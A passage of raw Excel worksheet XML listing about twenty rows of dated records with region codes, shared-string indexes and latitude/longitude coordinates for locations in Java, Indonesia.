        <v>-7.05255,110.46896</v>
      </c>
    </row>
    <row r="2844" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2844">
        <v>232378</v>
      </c>
      <c r="B2844" s="1">
        <v>44233</v>
      </c>
      <c r="C2844" s="2">
        <v>9.5104166666666656E-2</v>
      </c>
      <c r="D2844" t="s">
        <v>22</v>
      </c>
      <c r="E2844" t="s">
        <v>23</v>
      </c>
      <c r="F2844" t="s">
        <v>9643</v>
      </c>
      <c r="G2844" t="s">
        <v>9644</v>
      </c>
      <c r="H2844" t="s">
        <v>26</v>
      </c>
      <c r="I2844" t="s">
        <v>137</v>
      </c>
      <c r="J2844" t="s">
        <v>9645</v>
      </c>
      <c r="M2844">
        <v>3374120004</v>
      </c>
      <c r="N2844">
        <v>3374120</v>
      </c>
      <c r="O2844">
        <v>3374</v>
      </c>
      <c r="P2844">
        <v>33</v>
      </c>
      <c r="Q2844" t="s">
        <v>9646</v>
      </c>
      <c r="R2844" t="s">
        <v>9647</v>
      </c>
      <c r="S2844" t="s">
        <v>1334</v>
      </c>
      <c r="T2844" t="s">
        <v>1134</v>
      </c>
      <c r="U2844" s="5">
        <v>11040587</v>
      </c>
      <c r="V2844" s="5" t="s">
        <v>17009</v>
      </c>
      <c r="W2844" s="5">
        <v>-696265</v>
      </c>
      <c r="X2844" t="s">
        <v>20747</v>
      </c>
      <c r="Y2844" t="str">
        <f t="shared" si="44"/>
        <v>-6.96265,110.40587</v>
      </c>
    </row>
    <row r="2845" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2845">
        <v>232380</v>
      </c>
      <c r="B2845" s="1">
        <v>44233</v>
      </c>
      <c r="C2845" s="2">
        <v>0.11734953703703704</v>
      </c>
      <c r="D2845" t="s">
        <v>22</v>
      </c>
      <c r="E2845" t="s">
        <v>23</v>
      </c>
      <c r="F2845" t="s">
        <v>9648</v>
      </c>
      <c r="H2845" t="s">
        <v>7978</v>
      </c>
      <c r="I2845" t="s">
        <v>7983</v>
      </c>
      <c r="J2845" t="s">
        <v>2622</v>
      </c>
      <c r="L2845" t="s">
        <v>9649</v>
      </c>
      <c r="M2845">
        <v>3571010007</v>
      </c>
      <c r="N2845">
        <v>3571010</v>
      </c>
      <c r="O2845">
        <v>3571</v>
      </c>
      <c r="P2845">
        <v>35</v>
      </c>
      <c r="Q2845" t="s">
        <v>9255</v>
      </c>
      <c r="R2845" t="s">
        <v>8660</v>
      </c>
      <c r="S2845" t="s">
        <v>8365</v>
      </c>
      <c r="T2845" t="s">
        <v>1221</v>
      </c>
      <c r="U2845" s="5">
        <v>11200665</v>
      </c>
      <c r="V2845" s="5" t="s">
        <v>17010</v>
      </c>
      <c r="W2845" s="5">
        <v>-782442</v>
      </c>
      <c r="X2845" t="s">
        <v>20748</v>
      </c>
      <c r="Y2845" t="str">
        <f t="shared" si="44"/>
        <v>-7.82442,112.00665</v>
      </c>
    </row>
    <row r="2846" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2846">
        <v>232381</v>
      </c>
      <c r="B2846" s="1">
        <v>44233</v>
      </c>
      <c r="C2846" s="2">
        <v>0.12649305555555554</v>
      </c>
      <c r="D2846" t="s">
        <v>22</v>
      </c>
      <c r="E2846" t="s">
        <v>23</v>
      </c>
      <c r="F2846" t="s">
        <v>9650</v>
      </c>
      <c r="H2846" t="s">
        <v>26</v>
      </c>
      <c r="I2846" t="s">
        <v>383</v>
      </c>
      <c r="J2846" t="s">
        <v>2622</v>
      </c>
      <c r="L2846" t="s">
        <v>9651</v>
      </c>
      <c r="M2846">
        <v>3571010005</v>
      </c>
      <c r="N2846">
        <v>3571010</v>
      </c>
      <c r="O2846">
        <v>3571</v>
      </c>
      <c r="P2846">
        <v>35</v>
      </c>
      <c r="Q2846" t="s">
        <v>9652</v>
      </c>
      <c r="R2846" t="s">
        <v>8660</v>
      </c>
      <c r="S2846" t="s">
        <v>8365</v>
      </c>
      <c r="T2846" t="s">
        <v>1221</v>
      </c>
      <c r="U2846" s="5">
        <v>11200493</v>
      </c>
      <c r="V2846" s="5" t="s">
        <v>17011</v>
      </c>
      <c r="W2846" s="5">
        <v>-782665</v>
      </c>
      <c r="X2846" t="s">
        <v>20749</v>
      </c>
      <c r="Y2846" t="str">
        <f t="shared" si="44"/>
        <v>-7.82665,112.00493</v>
      </c>
    </row>
    <row r="2847" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2847">
        <v>232382</v>
      </c>
      <c r="B2847" s="1">
        <v>44233</v>
      </c>
      <c r="C2847" s="2">
        <v>0.12875</v>
      </c>
      <c r="D2847" t="s">
        <v>22</v>
      </c>
      <c r="E2847" t="s">
        <v>23</v>
      </c>
      <c r="F2847" t="s">
        <v>9653</v>
      </c>
      <c r="H2847" t="s">
        <v>26</v>
      </c>
      <c r="I2847" t="s">
        <v>137</v>
      </c>
      <c r="J2847" t="s">
        <v>2622</v>
      </c>
      <c r="L2847" t="s">
        <v>9654</v>
      </c>
      <c r="M2847">
        <v>3571010007</v>
      </c>
      <c r="N2847">
        <v>3571010</v>
      </c>
      <c r="O2847">
        <v>3571</v>
      </c>
      <c r="P2847">
        <v>35</v>
      </c>
      <c r="Q2847" t="s">
        <v>9255</v>
      </c>
      <c r="R2847" t="s">
        <v>8660</v>
      </c>
      <c r="S2847" t="s">
        <v>8365</v>
      </c>
      <c r="T2847" t="s">
        <v>1221</v>
      </c>
      <c r="U2847" s="5">
        <v>11200840</v>
      </c>
      <c r="V2847" s="5" t="s">
        <v>17012</v>
      </c>
      <c r="W2847" s="5">
        <v>-782537</v>
      </c>
      <c r="X2847" t="s">
        <v>20750</v>
      </c>
      <c r="Y2847" t="str">
        <f t="shared" si="44"/>
        <v>-7.82537,112.00840</v>
      </c>
    </row>
    <row r="2848" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2848">
        <v>232383</v>
      </c>
      <c r="B2848" s="1">
        <v>44233</v>
      </c>
      <c r="C2848" s="2">
        <v>0.13123842592592591</v>
      </c>
      <c r="D2848" t="s">
        <v>22</v>
      </c>
      <c r="E2848" t="s">
        <v>23</v>
      </c>
      <c r="F2848" t="s">
        <v>9655</v>
      </c>
      <c r="H2848" t="s">
        <v>7978</v>
      </c>
      <c r="I2848" t="s">
        <v>7979</v>
      </c>
      <c r="J2848" t="s">
        <v>2622</v>
      </c>
      <c r="L2848" t="s">
        <v>9656</v>
      </c>
      <c r="M2848">
        <v>3519050004</v>
      </c>
      <c r="N2848">
        <v>3519050</v>
      </c>
      <c r="O2848">
        <v>3519</v>
      </c>
      <c r="P2848">
        <v>35</v>
      </c>
      <c r="Q2848" t="s">
        <v>9657</v>
      </c>
      <c r="R2848" t="s">
        <v>9658</v>
      </c>
      <c r="S2848" t="s">
        <v>1220</v>
      </c>
      <c r="T2848" t="s">
        <v>1221</v>
      </c>
      <c r="U2848" s="5">
        <v>11155963</v>
      </c>
      <c r="V2848" s="5" t="s">
        <v>17013</v>
      </c>
      <c r="W2848" s="5">
        <v>-764531</v>
      </c>
      <c r="X2848" t="s">
        <v>20751</v>
      </c>
      <c r="Y2848" t="str">
        <f t="shared" si="44"/>
        <v>-7.64531,111.55963</v>
      </c>
    </row>
    <row r="2849" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2849">
        <v>232386</v>
      </c>
      <c r="B2849" s="1">
        <v>44233</v>
      </c>
      <c r="C2849" s="2">
        <v>0.14372685185185186</v>
      </c>
      <c r="D2849" t="s">
        <v>22</v>
      </c>
      <c r="E2849" t="s">
        <v>23</v>
      </c>
      <c r="F2849" t="s">
        <v>9659</v>
      </c>
      <c r="H2849" t="s">
        <v>26</v>
      </c>
      <c r="I2849" t="s">
        <v>2300</v>
      </c>
      <c r="J2849" t="s">
        <v>2622</v>
      </c>
      <c r="L2849" t="s">
        <v>9660</v>
      </c>
      <c r="M2849">
        <v>3571010007</v>
      </c>
      <c r="N2849">
        <v>3571010</v>
      </c>
      <c r="O2849">
        <v>3571</v>
      </c>
      <c r="P2849">
        <v>35</v>
      </c>
      <c r="Q2849" t="s">
        <v>9255</v>
      </c>
      <c r="R2849" t="s">
        <v>8660</v>
      </c>
      <c r="S2849" t="s">
        <v>8365</v>
      </c>
      <c r="T2849" t="s">
        <v>1221</v>
      </c>
      <c r="U2849" s="5">
        <v>11200692</v>
      </c>
      <c r="V2849" s="5" t="s">
        <v>17014</v>
      </c>
      <c r="W2849" s="5">
        <v>-781993</v>
      </c>
      <c r="X2849" t="s">
        <v>20752</v>
      </c>
      <c r="Y2849" t="str">
        <f t="shared" si="44"/>
        <v>-7.81993,112.00692</v>
      </c>
    </row>
    <row r="2850" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2850">
        <v>232389</v>
      </c>
      <c r="B2850" s="1">
        <v>44233</v>
      </c>
      <c r="C2850" s="2">
        <v>0.17195601851851852</v>
      </c>
      <c r="D2850" t="s">
        <v>22</v>
      </c>
      <c r="E2850" t="s">
        <v>23</v>
      </c>
      <c r="F2850" t="s">
        <v>9661</v>
      </c>
      <c r="G2850" t="s">
        <v>9662</v>
      </c>
      <c r="H2850" t="s">
        <v>26</v>
      </c>
      <c r="I2850" t="s">
        <v>76</v>
      </c>
      <c r="J2850" t="s">
        <v>9663</v>
      </c>
      <c r="M2850">
        <v>3374100006</v>
      </c>
      <c r="N2850">
        <v>3374100</v>
      </c>
      <c r="O2850">
        <v>3374</v>
      </c>
      <c r="P2850">
        <v>33</v>
      </c>
      <c r="Q2850" t="s">
        <v>9664</v>
      </c>
      <c r="R2850" t="s">
        <v>9608</v>
      </c>
      <c r="S2850" t="s">
        <v>1334</v>
      </c>
      <c r="T2850" t="s">
        <v>1134</v>
      </c>
      <c r="U2850" s="5">
        <v>11044762</v>
      </c>
      <c r="V2850" s="5" t="s">
        <v>17015</v>
      </c>
      <c r="W2850" s="5">
        <v>-696007</v>
      </c>
      <c r="X2850" t="s">
        <v>20753</v>
      </c>
      <c r="Y2850" t="str">
        <f t="shared" si="44"/>
        <v>-6.96007,110.44762</v>
      </c>
    </row>
    <row r="2851" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2851">
        <v>232390</v>
      </c>
      <c r="B2851" s="1">
        <v>44233</v>
      </c>
      <c r="C2851" s="2">
        <v>0.17429398148148148</v>
      </c>
      <c r="D2851" t="s">
        <v>22</v>
      </c>
      <c r="E2851" t="s">
        <v>23</v>
      </c>
      <c r="F2851" t="s">
        <v>9665</v>
      </c>
      <c r="H2851" t="s">
        <v>26</v>
      </c>
      <c r="I2851" t="s">
        <v>137</v>
      </c>
      <c r="J2851" t="s">
        <v>2608</v>
      </c>
      <c r="L2851" t="s">
        <v>9666</v>
      </c>
      <c r="M2851">
        <v>3321040008</v>
      </c>
      <c r="N2851">
        <v>3321040</v>
      </c>
      <c r="O2851">
        <v>3321</v>
      </c>
      <c r="P2851">
        <v>33</v>
      </c>
      <c r="Q2851" t="s">
        <v>9667</v>
      </c>
      <c r="R2851" t="s">
        <v>1453</v>
      </c>
      <c r="S2851" t="s">
        <v>1428</v>
      </c>
      <c r="T2851" t="s">
        <v>1134</v>
      </c>
      <c r="U2851" s="5">
        <v>11053847</v>
      </c>
      <c r="V2851" s="5" t="s">
        <v>17016</v>
      </c>
      <c r="W2851" s="5">
        <v>-696057</v>
      </c>
      <c r="X2851" t="s">
        <v>20754</v>
      </c>
      <c r="Y2851" t="str">
        <f t="shared" si="44"/>
        <v>-6.96057,110.53847</v>
      </c>
    </row>
    <row r="2852" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2852">
        <v>232391</v>
      </c>
      <c r="B2852" s="1">
        <v>44233</v>
      </c>
      <c r="C2852" s="2">
        <v>0.2293287037037037</v>
      </c>
      <c r="D2852" t="s">
        <v>22</v>
      </c>
      <c r="E2852" t="s">
        <v>23</v>
      </c>
      <c r="F2852" t="s">
        <v>9668</v>
      </c>
      <c r="G2852" t="s">
        <v>9669</v>
      </c>
      <c r="H2852" t="s">
        <v>26</v>
      </c>
      <c r="I2852" t="s">
        <v>137</v>
      </c>
      <c r="J2852" t="s">
        <v>1656</v>
      </c>
      <c r="L2852" t="s">
        <v>9670</v>
      </c>
      <c r="M2852">
        <v>3173080003</v>
      </c>
      <c r="N2852">
        <v>3173080</v>
      </c>
      <c r="O2852">
        <v>3173</v>
      </c>
      <c r="P2852">
        <v>31</v>
      </c>
      <c r="Q2852" t="s">
        <v>157</v>
      </c>
      <c r="R2852" t="s">
        <v>157</v>
      </c>
      <c r="S2852" t="s">
        <v>62</v>
      </c>
      <c r="T2852" t="s">
        <v>33</v>
      </c>
      <c r="U2852" s="5">
        <v>10682715</v>
      </c>
      <c r="V2852" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W2852" s="5">
        <v>-617539</v>
      </c>
      <c r="X2852" t="s">
        <v>19329</v>
      </c>
      <c r="Y2852" t="str">
        <f t="shared" si="44"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="2853" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2853">
        <v>232392</v>
      </c>
      <c r="B2853" s="1">
        <v>44233</v>
      </c>
      <c r="C2853" s="2">
        <v>0.25182870370370369</v>
      </c>
      <c r="D2853" t="s">
        <v>22</v>
      </c>
      <c r="E2853" t="s">
        <v>23</v>
      </c>
      <c r="F2853" t="s">
        <v>9671</v>
      </c>
      <c r="H2853" t="s">
        <v>26</v>
      </c>
      <c r="I2853" t="s">
        <v>137</v>
      </c>
      <c r="J2853" t="s">
        <v>9672</v>
      </c>
      <c r="L2853" t="s">
        <v>9673</v>
      </c>
      <c r="M2853">
        <v>3374080012</v>
      </c>
      <c r="N2853">
        <v>3374080</v>
      </c>
      <c r="O2853">
        <v>3374</v>
      </c>
      <c r="P2853">
        <v>33</v>
      </c>
      <c r="Q2853" t="s">
        <v>2991</v>
      </c>
      <c r="R2853" t="s">
        <v>2992</v>
      </c>
      <c r="S2853" t="s">
        <v>1334</v>
      </c>
      <c r="T2853" t="s">
        <v>1134</v>
      </c>
      <c r="U2853" s="5">
        <v>11045729</v>
      </c>
      <c r="V2853" s="5" t="s">
        <v>17017</v>
      </c>
      <c r="W2853" s="5">
        <v>-697714</v>
      </c>
      <c r="X2853" t="s">
        <v>20755</v>
      </c>
      <c r="Y2853" t="str">
        <f t="shared" si="44"/>
        <v>-6.97714,110.45729</v>
      </c>
    </row>
    <row r="2854" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2854">
        <v>232394</v>
      </c>
      <c r="B2854" s="1">
        <v>44233</v>
      </c>
      <c r="C2854" s="2">
        <v>0.29946759259259259</v>
      </c>
      <c r="D2854" t="s">
        <v>22</v>
      </c>
      <c r="E2854" t="s">
        <v>23</v>
      </c>
      <c r="F2854" t="s">
        <v>9674</v>
      </c>
      <c r="H2854" t="s">
        <v>26</v>
      </c>
      <c r="I2854" t="s">
        <v>834</v>
      </c>
      <c r="J2854" t="s">
        <v>2622</v>
      </c>
      <c r="L2854" t="s">
        <v>9675</v>
      </c>
      <c r="M2854">
        <v>3517010001</v>
      </c>
      <c r="N2854">
        <v>3517010</v>
      </c>
      <c r="O2854">
        <v>3517</v>
      </c>
      <c r="P2854">
        <v>35</v>
      </c>
      <c r="Q2854" t="s">
        <v>9676</v>
      </c>
      <c r="R2854" t="s">
        <v>9676</v>
      </c>
      <c r="S2854" t="s">
        <v>340</v>
      </c>
      <c r="T2854" t="s">
        <v>1221</v>
      </c>
      <c r="U2854" s="5">
        <v>11211499</v>
      </c>
      <c r="V2854" s="5" t="s">
        <v>17018</v>
      </c>
      <c r="W2854" s="5">
        <v>-759198</v>
      </c>
      <c r="X2854" t="s">
        <v>20756</v>
      </c>
      <c r="Y2854" t="str">
        <f t="shared" si="44"/>
        <v>-7.59198,112.11499</v>
      </c>
    </row>
    <row r="2855" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2855">
        <v>232395</v>
      </c>
      <c r="B2855" s="1">
        <v>44233</v>
      </c>
      <c r="C2855" s="2">
        <v>0.29846064814814816</v>
      </c>
      <c r="D2855" t="s">
        <v>85</v>
      </c>
      <c r="E2855" t="s">
        <v>23</v>
      </c>
      <c r="F2855" t="s">
        <v>9677</v>
      </c>
      <c r="G2855" t="s">
        <v>9678</v>
      </c>
      <c r="H2855" t="s">
        <v>26</v>
      </c>
      <c r="J2855" t="s">
        <v>2608</v>
      </c>
      <c r="K2855" t="s">
        <v>9679</v>
      </c>
      <c r="L2855" t="s">
        <v>9680</v>
      </c>
      <c r="M2855">
        <v>3321020005</v>
      </c>
      <c r="N2855">
        <v>3321020</v>
      </c>
      <c r="O2855">
        <v>3321</v>
      </c>
      <c r="P2855">
        <v>33</v>
      </c>
      <c r="Q2855" t="s">
        <v>9681</v>
      </c>
      <c r="R2855" t="s">
        <v>9682</v>
      </c>
      <c r="S2855" t="s">
        <v>1428</v>
      </c>
      <c r="T2855" t="s">
        <v>1134</v>
      </c>
      <c r="U2855" s="5">
        <v>11054575</v>
      </c>
      <c r="V2855" s="5" t="s">
        <v>17019</v>
      </c>
      <c r="W2855" s="5">
        <v>-705320</v>
      </c>
      <c r="X2855" t="s">
        <v>20757</v>
      </c>
      <c r="Y2855" t="str">
        <f t="shared" si="44"/>
        <v>-7.05320,110.54575</v>
      </c>
    </row>
    <row r="2856" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2856">
        <v>232397</v>
      </c>
      <c r="B2856" s="1">
        <v>44233</v>
      </c>
      <c r="C2856" s="2">
        <v>0.33414351851851848</v>
      </c>
      <c r="D2856" t="s">
        <v>22</v>
      </c>
      <c r="E2856" t="s">
        <v>23</v>
      </c>
      <c r="F2856" t="s">
        <v>9683</v>
      </c>
      <c r="G2856" t="s">
        <v>9684</v>
      </c>
      <c r="H2856" t="s">
        <v>26</v>
      </c>
      <c r="I2856" t="s">
        <v>1542</v>
      </c>
      <c r="J2856" t="s">
        <v>9685</v>
      </c>
      <c r="L2856" t="s">
        <v>9686</v>
      </c>
      <c r="M2856">
        <v>3374090002</v>
      </c>
      <c r="N2856">
        <v>3374090</v>
      </c>
      <c r="O2856">
        <v>3374</v>
      </c>
      <c r="P2856">
        <v>33</v>
      </c>
      <c r="Q2856" t="s">
        <v>1411</v>
      </c>
      <c r="R2856" t="s">
        <v>1362</v>
      </c>
      <c r="S2856" t="s">
        <v>1334</v>
      </c>
      <c r="T2856" t="s">
        <v>1134</v>
      </c>
      <c r="U2856" s="5">
        <v>11046511</v>
      </c>
      <c r="V2856" s="5" t="s">
        <v>17020</v>
      </c>
      <c r="W2856" s="5">
        <v>-696470</v>
      </c>
      <c r="X2856" t="s">
        <v>20758</v>
      </c>
      <c r="Y2856" t="str">
        <f t="shared" si="44"/>
        <v>-6.96470,110.46511</v>
      </c>
    </row>
    <row r="2857" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2857">
        <v>232398</v>
      </c>
      <c r="B2857" s="1">
        <v>44233</v>
      </c>
      <c r="C2857" s="2">
        <v>0.36459490740740735</v>
      </c>
      <c r="D2857" t="s">
        <v>22</v>
      </c>
      <c r="E2857" t="s">
        <v>23</v>
      </c>
      <c r="F2857" t="s">
        <v>9687</v>
      </c>
      <c r="G2857" t="s">
        <v>9688</v>
      </c>
      <c r="H2857" t="s">
        <v>26</v>
      </c>
      <c r="I2857" t="s">
        <v>181</v>
      </c>
      <c r="J2857" t="s">
        <v>9689</v>
      </c>
      <c r="L2857" t="s">
        <v>250</v>
      </c>
      <c r="M2857">
        <v>3374090003</v>
      </c>
      <c r="N2857">
        <v>3374090</v>
      </c>
      <c r="O2857">
        <v>3374</v>
      </c>
      <c r="P2857">
        <v>33</v>
      </c>
      <c r="Q2857" t="s">
        <v>9690</v>
      </c>
      <c r="R2857" t="s">
        <v>1362</v>
      </c>
      <c r="S2857" t="s">
        <v>1334</v>
      </c>
      <c r="T2857" t="s">
        <v>1134</v>
      </c>
      <c r="U2857" s="5">
        <v>11048060</v>
      </c>
      <c r="V2857" s="5" t="s">
        <v>17021</v>
      </c>
      <c r="W2857" s="5">
        <v>-695332</v>
      </c>
      <c r="X2857" t="s">
        <v>20759</v>
      </c>
      <c r="Y2857" t="str">
        <f t="shared" si="44"/>
        <v>-6.95332,110.48060</v>
      </c>
    </row>
    <row r="2858" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2858">
        <v>232399</v>
      </c>
      <c r="B2858" s="1">
        <v>44233</v>
      </c>
      <c r="C2858" s="2">
        <v>0.38045138888888891</v>
      </c>
      <c r="D2858" t="s">
        <v>22</v>
      </c>
      <c r="E2858" t="s">
        <v>23</v>
      </c>
      <c r="F2858" t="s">
        <v>9691</v>
      </c>
      <c r="H2858" t="s">
        <v>26</v>
      </c>
      <c r="I2858" t="s">
        <v>5612</v>
      </c>
      <c r="J2858" t="s">
        <v>9692</v>
      </c>
      <c r="L2858" t="s">
        <v>9693</v>
      </c>
      <c r="M2858">
        <v>3374120004</v>
      </c>
      <c r="N2858">
        <v>3374120</v>
      </c>
      <c r="O2858">
        <v>3374</v>
      </c>
      <c r="P2858">
        <v>33</v>
      </c>
      <c r="Q2858" t="s">
        <v>9646</v>
      </c>
      <c r="R2858" t="s">
        <v>9647</v>
      </c>
      <c r="S2858" t="s">
        <v>1334</v>
      </c>
      <c r="T2858" t="s">
        <v>1134</v>
      </c>
      <c r="U2858" s="5">
        <v>11040275</v>
      </c>
      <c r="V2858" s="5" t="s">
        <v>17022</v>
      </c>
      <c r="W2858" s="5">
        <v>-696309</v>
      </c>
      <c r="X2858" t="s">
        <v>20760</v>
      </c>
      <c r="Y2858" t="str">
        <f t="shared" si="44"/>
        <v>-6.96309,110.40275</v>
      </c>
    </row>
    <row r="2859" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2859">
        <v>232400</v>
      </c>
      <c r="B2859" s="1">
        <v>44233</v>
      </c>
      <c r="C2859" s="2">
        <v>0.4505439814814815</v>
      </c>
      <c r="D2859" t="s">
        <v>22</v>
      </c>
      <c r="E2859" t="s">
        <v>23</v>
      </c>
      <c r="F2859" t="s">
        <v>9694</v>
      </c>
      <c r="H2859" t="s">
        <v>26</v>
      </c>
      <c r="I2859" t="s">
        <v>137</v>
      </c>
      <c r="J2859" t="s">
        <v>9695</v>
      </c>
      <c r="L2859" t="s">
        <v>9696</v>
      </c>
      <c r="M2859">
        <v>3374090010</v>
      </c>
      <c r="N2859">
        <v>3374090</v>
      </c>
      <c r="O2859">
        <v>3374</v>
      </c>
      <c r="P2859">
        <v>33</v>
      </c>
      <c r="Q2859" t="s">
        <v>9697</v>
      </c>
      <c r="R2859" t="s">
        <v>1362</v>
      </c>
      <c r="S2859" t="s">
        <v>1334</v>
      </c>
      <c r="T2859" t="s">
        <v>1134</v>
      </c>
      <c r="U2859" s="5">
        <v>11048259</v>
      </c>
      <c r="V2859" s="5" t="s">
        <v>17023</v>
      </c>
      <c r="W2859" s="5">
        <v>-695382</v>
      </c>
      <c r="X2859" t="s">
        <v>20761</v>
      </c>
      <c r="Y2859" t="str">
        <f t="shared" si="44"/>
        <v>-6.95382,110.48259</v>
      </c>
    </row>
    <row r="2860" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2860">
        <v>232402</v>
      </c>
      <c r="B2860" s="1">
        <v>44233</v>
      </c>
      <c r="C2860" s="2">
        <v>0.52240740740740743</v>
      </c>
      <c r="D2860" t="s">
        <v>22</v>
      </c>
      <c r="E2860" t="s">
        <v>23</v>
      </c>
      <c r="F2860" t="s">
        <v>9698</v>
      </c>
      <c r="G2860" t="s">
        <v>9699</v>
      </c>
      <c r="H2860" t="s">
        <v>26</v>
      </c>
      <c r="I2860" t="s">
        <v>9700</v>
      </c>
      <c r="J2860" t="s">
        <v>9701</v>
      </c>
      <c r="L2860" t="s">
        <v>9702</v>
      </c>
      <c r="M2860">
        <v>3374090004</v>
      </c>
      <c r="N2860">
        <v>3374090</v>
      </c>
      <c r="O2860">
        <v>3374</v>
      </c>
      <c r="P2860">
        <v>33</v>
      </c>
      <c r="Q2860" t="s">
        <v>9703</v>
      </c>
      <c r="R2860" t="s">
        <v>1362</v>
      </c>
      <c r="S2860" t="s">
        <v>1334</v>
      </c>
      <c r="T2860" t="s">
        <v>1134</v>
      </c>
      <c r="U2860" s="5">
        <v>11046375</v>
      </c>
      <c r="V2860" s="5" t="s">
        <v>17024</v>
      </c>
      <c r="W2860" s="5">
        <v>-697307</v>
      </c>
      <c r="X2860" t="s">
        <v>20762</v>
      </c>
      <c r="Y2860" t="str">
        <f t="shared" si="44"/>
        <v>-6.97307,110.46375</v>
      </c>
    </row>
    <row r="2861" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2861">
        <v>232403</v>
      </c>
      <c r="B2861" s="1">
        <v>44233</v>
      </c>
      <c r="C2861" s="2">
        <v>0.65015046296296297</v>
      </c>
      <c r="D2861" t="s">
        <v>22</v>
      </c>
      <c r="E2861" t="s">
        <v>23</v>
      </c>
      <c r="F2861" t="s">
        <v>9704</v>
      </c>
      <c r="G2861" t="s">
        <v>9705</v>
      </c>
      <c r="H2861" t="s">
        <v>26</v>
      </c>
      <c r="I2861" t="s">
        <v>2196</v>
      </c>
      <c r="J2861" t="s">
        <v>9706</v>
      </c>
      <c r="L2861" t="s">
        <v>9707</v>
      </c>
      <c r="M2861">
        <v>3374120007</v>
      </c>
      <c r="N2861">
        <v>3374120</v>
      </c>
      <c r="O2861">
        <v>3374</v>
      </c>
      <c r="P2861">
        <v>33</v>
      </c>
      <c r="Q2861" t="s">
        <v>9708</v>
      </c>
      <c r="R2861" t="s">
        <v>9647</v>
      </c>
      <c r="S2861" t="s">
        <v>1334</v>
      </c>
      <c r="T2861" t="s">
        <v>1134</v>
      </c>
      <c r="U2861" s="5">
        <v>11041924</v>
      </c>
      <c r="V2861" s="5" t="s">
        <v>17025</v>
      </c>
      <c r="W2861" s="5">
        <v>-696753</v>
      </c>
      <c r="X2861" t="s">
        <v>20763</v>
      </c>
      <c r="Y2861" t="str">
        <f t="shared" si="44"/>
        <v>-6.96753,110.41924</v>
      </c>
    </row>
    <row r="2862" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2862">
        <v>232404</v>
      </c>
      <c r="B2862" s="1">
        <v>44233</v>
      </c>
      <c r="C2862" s="2">
        <v>0.65091435185185187</v>
      </c>
      <c r="D2862" t="s">
        <v>22</v>
      </c>
      <c r="E2862" t="s">
        <v>23</v>
      </c>
      <c r="F2862" t="s">
        <v>9709</v>
      </c>
      <c r="G2862" t="s">
        <v>9710</v>
      </c>
      <c r="H2862" t="s">
        <v>26</v>
      </c>
      <c r="I2862" t="s">
        <v>2002</v>
      </c>
      <c r="J2862" t="s">
        <v>9711</v>
      </c>
      <c r="L2862" t="s">
        <v>9712</v>
      </c>
      <c r="M2862">
        <v>3374080012</v>
      </c>
      <c r="N2862">
        <v>3374080</v>
      </c>
      <c r="O2862">
        <v>3374</v>
      </c>
      <c r="P2862">
        <v>33</v>
      </c>
      <c r="Q2862" t="s">
        <v>2991</v>
      </c>
      <c r="R2862" t="s">
        <v>2992</v>
      </c>
      <c r="S2862" t="s">
        <v>1334</v>
      </c>
      <c r="T2862" t="s">
        <v>1134</v>
      </c>
      <c r="U2862" s="5">
        <v>11045347</v>
      </c>
      <c r="V2862" s="5" t="s">
        <v>17026</v>
      </c>
      <c r="W2862" s="5">
        <v>-696585</v>
      </c>
      <c r="X2862" t="s">
        <v>20764</v>
      </c>
      <c r="Y2862" t="str">
        <f t="shared" si="44"/>
        <v>-6.96585,110.45347</v>
      </c>
    </row>
    <row r="2863" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2863">
        <v>232405</v>
      </c>
      <c r="B2863" s="1">
        <v>44233</v>
      </c>
      <c r="C2863" s="2">
        <v>0.66994212962962962</v>
      </c>
      <c r="D2863" t="s">
        <v>22</v>
      </c>
      <c r="E2863" t="s">
        <v>23</v>
      </c>
      <c r="F2863" t="s">
        <v>9713</v>
      </c>
      <c r="G2863" t="s">
        <v>9714</v>
      </c>
      <c r="H2863" t="s">
        <v>26</v>
      </c>
      <c r="I2863" t="s">
        <v>6317</v>
      </c>
      <c r="J2863" t="s">
        <v>3135</v>
      </c>
      <c r="L2863" t="s">
        <v>9715</v>
      </c>
      <c r="M2863">
        <v>3674040005</v>
      </c>
      <c r="N2863">
        <v>3674040</v>
      </c>
      <c r="O2863">
        <v>3674</v>
      </c>
      <c r="P2863">
        <v>36</v>
      </c>
      <c r="Q2863" t="s">
        <v>9716</v>
      </c>
      <c r="R2863" t="s">
        <v>229</v>
      </c>
      <c r="S2863" t="s">
        <v>170</v>
      </c>
      <c r="T2863" t="s">
        <v>171</v>
      </c>
      <c r="U2863" s="5">
        <v>10672679</v>
      </c>
      <c r="V2863" s="5" t="s">
        <v>17027</v>
      </c>
      <c r="W2863" s="5">
        <v>-629171</v>
      </c>
      <c r="X2863" t="s">
        <v>20765</v>
      </c>
      <c r="Y2863" t="str">
        <f t="shared" si="44"/>
        <v>-6.29171,106.72679</v>
      </c>
    </row>
    <row r="2864" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2864">
        <v>232406</v>
      </c>
      <c r="B2864" s="1">
        <v>44233</v>
      </c>
      <c r="C2864" s="2">
        <v>0.69640046296296287</v>
      </c>
      <c r="D2864" t="s">
        <v>22</v>
      </c>
      <c r="E2864" t="s">
        <v>23</v>
      </c>
      <c r="F2864" t="s">
        <v>9717</v>
      </c>
      <c r="G2864" t="s">
        <v>9718</v>
      </c>
      <c r="H2864" t="s">
        <v>26</v>
      </c>
      <c r="I2864" t="s">
        <v>592</v>
      </c>
      <c r="J2864" t="s">
        <v>9719</v>
      </c>
      <c r="L2864" t="s">
        <v>9720</v>
      </c>
      <c r="M2864">
        <v>3374130008</v>
      </c>
